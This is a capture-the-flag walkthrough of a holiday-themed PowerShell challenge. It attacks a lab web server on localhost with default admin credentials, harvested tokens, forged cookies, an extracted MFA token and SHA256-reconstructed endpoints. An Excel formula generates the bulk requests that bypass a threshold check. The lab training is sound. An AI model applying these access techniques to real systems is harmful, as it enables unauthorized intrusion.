PowerShell
Difficulty:
Shown in Report
Team Wombley is developing snow weapons in preparation for conflict, but they've been locked out by their own defenses. Help Piney with regaining access to the weapon operations terminal.
Objective Image
Back
Challenge

I'm Piney Sappington, and with all this tension between Wombley and Alabaster's factions, I need your help accessing two functions in our PowerShell Terminal for snowball weaponry - the snow cannon terminal (which should be relatively easy) and the more heavily defended production and deployment plans. While I definitely didn't program these defense mechanisms myself, they're in a faulty lockdown state, and your skills might give us the advantage we need right now.

Solution
Silver medal

The dialogue guides us and also gives us clues. For this reason, I have only listed the questions and the corresponding answers below.

Are you ready to begin? [y]es: y

1) There is a file in the current directory called 'welcome.txt'. Read the contents of this file
PS /home/user> Get-Content ./welcome.txt

2) Geez that sounds ominous, I'm sure we can get past the defense mechanisms. 
We should warm up our PowerShell skills. 
How many words are there in the file?
PS /home/user> Get-Content ./welcome.txt | Measure-Object -Word

3) There is a server listening for incoming connections on this machine, that must be the weapons terminal. What port is it listening on?
PS /home/user> netstat -l

4) You should enumerate that webserver. Communicate with the server using HTTP, what status code do you get?
PS /home/user> Invoke-WebRequest -uri "http://localhost:1225"

5) It looks like defensive measures are in place, it is protected by basic authentication. 
Try authenticating with a standard admin username and password.
PS /home/user> $base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("admin:admin"))      
PS /home/user> $headers = @{Authorization = "Basic $base64AuthInfo"}           
PS /home/user> Invoke-WebRequest -Uri "http://localhost:1225" -Headers $headers 

6) There are too many endpoints here. 
Use a loop to download the contents of each page. What page has 138 words? 
When you find it, communicate with the URL and print the contents to the terminal.
$response = Invoke-WebRequest -Uri "http://localhost:1225" -Headers $headers
foreach ($link in $response.Links) {
    $url = $link.href
    $linkResponse = Invoke-WebRequest -Uri $url
    $wordCount = ($linkResponse.Content -split '\s+' | Measure-Object).Count
    Write-Output "URL: $url - Word Count: $wordCount"
}
PS /home/user> (Invoke-WebRequest -Uri "http://localhost:1225/endpoints/13").Content     

7) There seems to be a csv file in the comments of that page. 
 That could be valuable, read the contents of that csv-file!
PS /home/user> (Invoke-WebRequest -Headers $headers -Uri "http://127.0.0.1:1225/token_overview.csv").Content 

8) Luckily the defense mechanisms were faulty! 
There seems to be one api-endpoint that still isn't redacted! Communicate with that endpoint!
PS /home/user> (Invoke-WebRequest -Headers $headers -Uri "http://127.0.0.1:1225/token_overview.csv").Content -split "`n" | Where-Object { $_ -notmatch "REDACTED" }

9) It looks like it requires a cookie token, set the cookie and try again.
PS /home/user> $webSession = New-Object Microsoft.PowerShell.Commands.WebRequestSession
PS /home/user> $webSession.Cookies.Add((New-Object System.Net.Cookie("token", "5f8dd236f862f4507835b0e418907ffc", "/", "127.0.0.1")))
PS /home/user> (Invoke-WebRequest -Headers $headers -Uri "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -WebSession $webSession).Content

10) Sweet we got a MFA token! We might be able to get access to the system.
 Validate that token at the endpoint!
PS /home/user> $mfa = ((Invoke-WebRequest -Headers $headers -Uri "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -WebSession $webSession).Content).Substring(42, 18)
PS /home/user> $webSession.Cookies.Add((New-Object System.Net.Cookie("mfa_token", $mfa, "/", "127.0.0.1")))                                                                                   
PS /home/user> (Invoke-WebRequest -Headers $headers -Uri "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -WebSession $webSession).Content    

11) That looks like base64! Decode it so we can get the final secret!
PS /home/user> $encodedString = "Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="
PS /home/user> $decodedBytes = [Convert]::FromBase64String($encodedString)
PS /home/user> $decodedString = [Text.Encoding]::UTF8.GetString($decodedBytes)
PS /home/user> Write-Output $decodedString
Correct Token supplied, you are granted access to the snow cannon terminal. Here is your personal password for access: SnowLeopard2ReadyForAction

I'll let you in on a little secret—there’s a way to bypass the usual path and write your own PowerShell script to complete the challenge. Think you're up for it? I know you are!

Gold medal

PowerShell Admin Access - Total Control Hints: I overheard some of the other elves talking. Even though the endpoints have been redacted, they are still operational. This means that you can probably elevate your access by communicating with them. I suggest working out the hashing scheme to reproduce the redacted endpoints. Luckily one of them is still active and can be tested against. Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint. This might help, pipe the tokens to Get-FileHash -Algorithm SHA256.
PowerShell Admin Access - Fakeout EDR Threshold: They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response "EDR". The whole system is literally that you set a threshold and after that many attempts, the response is passed through... I can't believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints!

We have all the end points from step 7 of the previous task, even if they have been REDACTED. We could use Get-FileHash -Algorithm SHA256 as in the hints. But I quickly typed this in Linux to create proper hashes:

cat hashes.txt
04886164e5140175bafe599b7f1cacc8
664f52463ef97bcd1729d6de1028e41e
3e03cd0f3d335c6fb50122553f63ef78
...

for i in `cat hashes.txt `; do echo $i | sha256sum | cut -f 1 -d " "; done
dfd05f3b46d21bc8556cdbf544325a945ed0304ec0bb7dbfd68ed5931e7ff6ee
1f3c45d7e7b1f7621f67136c538c6933791d3392648c7b0f8b17fb1a6343ebd5
e2dbbdbcc7e57e526841899975b6621105710e76c203c1dc30419e7f1cba5297
...

With the second hint, we know that the threshold cookie is shared between all endpoints. Now we only have to fire all the requests to the endpoints. We could create a Powershell script on the target system to do this, but we'll make it easy for ourselves by having Excel assemble the individual calls (from the previous task) and copy all the generated commands into the console.

powershell.jpg

=VERKETTEN(
"$webSession.Cookies.Add((New-Object System.Net.Cookie(""token"", """&A1&""", ""/"", ""127.0.0.1""))); ";
"$mfa = (Invoke-WebRequest -Headers $headers -Uri ""http://127.0.0.1:1225/tokens/"&C1&""" -WebSession $webSession).Content.Substring(265, 18); ";
"$webSession.Cookies.Add((New-Object System.Net.Cookie(""mfa_token"", $mfa, ""/"", ""127.0.0.1""))); ";
"(Invoke-WebRequest -Headers $headers -Uri ""http://127.0.0.1:1225/mfa_validate/"&C1&""" -WebSession $webSession).Content"
)

powershell_2.jpg

I'm thrilled with your incredible PowerShell skills - you not only retrieved the needed codeword by navigating the tricky security, but you also tackled the harder path and demonstrated the expertise we desperately need during these tense times between factions!